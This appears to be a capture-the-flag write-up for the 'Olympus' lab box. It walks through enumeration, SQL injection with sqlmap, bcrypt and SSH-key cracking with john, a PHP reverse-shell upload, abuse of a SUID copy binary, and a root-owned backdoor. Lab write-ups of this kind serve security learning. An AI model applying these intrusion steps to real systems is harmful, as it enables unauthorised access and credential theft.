nmap -sC -sV -T4 $IP -oN initial.nmap Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 19:28 BST Nmap scan report for 10.10.39.133 Host is up (0.056s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA) | 256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA) |_ 256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Did not follow redirect to http://olympus.thm |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Initial nmap scan gives us two ports open so it’ll be a deep dive into the web app…
Adding olympus.thm to /etc/hosts gives us this landing page. Time to run some more enumeration.
Gobuster gives some results, including ~webmaster and phpmyadmin. The phpmyadmin result appears to be a red herring.
The webmaster URL contains posts suggests members are using weak passwords that may well be brute-force-able, should we be able to harvest some useful creds.
Running some basic LFI tests on the page comes up dry but there’s a login form that appears vulnerable to SQLi so I get SQLmap to work dumping the database (because I suck at SQLi). A little tip for easy SQLmap syntax is to submit a POST request to the form and grab the request in Firefox’s Network tab and copy as cURL.
19:52:06] [INFO] fetching tables for database: 'olympus' [19:52:06] [INFO] fetching number of tables for database 'olympus' [19:52:06] [INFO] retrieved: 6 [19:52:31] [INFO] retrieved: categories [19:56:15] [INFO] retrieved: chats [19:58:02] [INFO] retrieved: comments [20:01:21] [INFO] retrieved: flag [20:03:00] [INFO] retrieved: posts [20:05:46] [INFO] retrieved: users
Unsurprisingly inside the flag table, the first flag can be found.
+---------------------------+
| flag |
+---------------------------+
| flag{Sm4rt!_k33P_d1gGIng} |
+---------------------------+From the users table a set of credentials for user prometheus can be retrieved with with a hashed password. There’s a column named “randsalt” so I’d assumed the hash would be salted, but the fields were empty. We get the Bcrypt Hash and crack it for the user’s password.
$2y$10$YC6uoMwK9VpB5QL513vfLu1RV2sgBf01c0lzPHcz1qK2EArDvnj3C:summertime
Unfortunately this doesn’t let us log in on the SSH server, only into the CMS and after a lot of hunting conclude there’s no exploits available. It seems there is another subdomain revealed during enumeration which takes us to a chat app, with upload functionality and an apparent /uploads/ folder. The chat log mentions the app changing file names, but doesn’t seem to care what extension it’s given. Uploading a PHP reverse shell seems perfectly acceptable, and after checking the files column of the chat table we can pop a shell into www-data on the box.
Inside /home/zeus/ the second flag can be found, and now it’s time to enumerate and find a way to escalate.
It appears that www-data can run the SUID binary CPUtils, that copies any files under the user zeus. Using this means that it’s possible to copy zeus’s id_rsa from the .ssh folder and pop into a readable file inside /tmp/
Before log in the ssh key needs cracking so we can obtain the passphrase.
──(kali㉿kali)-[~/Desktop/thm/olympus] └─$ ssh2john id_rsa > id_rsa.hash ┌──(kali㉿kali)-[~/Desktop/thm/olympus] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status snowflake (id_rsa) 1g 0:00:00:29 DONE (2022-08-21 14:59) 0.03334g/s 51.21p/s 51.21c/s 51.21C/s 234567..mexico1 Use the "--show" option to display all of the cracked passwords reliably Session completed.
zeus@olympus:~$ id uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev)
There’s no obvious misconfiguration for zeus, but after some rooting around a folder named 0aB44fdS3eDnLkpsz3deGv8TttR4sc can be found in /var/www/html. When navigating directly to the URL it presents a login form, whose password can be found inside VIGQFQFMYOST.php.
<?php
$pass = "a7c5ffcf139742f52a5267c4a0674129";
if(!isset($_POST["password"]) || $_POST["password"] != $pass) die('<form name="auth" method="POST">Password: <input type="password" name="pass
word" /></form>'); ..........The form gives the syntax and it’s effectively a PHP reverse shell, like our initial foothold. Except the file is owned by root, not www-data so pops a shell as root!
Heading to /root/root.flag we get flag 3 and a hint that there’s a secret to be found. Generating some SSH keys will make this a bit less painful.
root@olympus:/etc# grep -irl flag{
ssl/private/.b0nus.fl4gSome quick digging and the bonus flag is found.
This was a fun box, blind SQLi takes time so made the box feel longer than it was but the path to root was fun.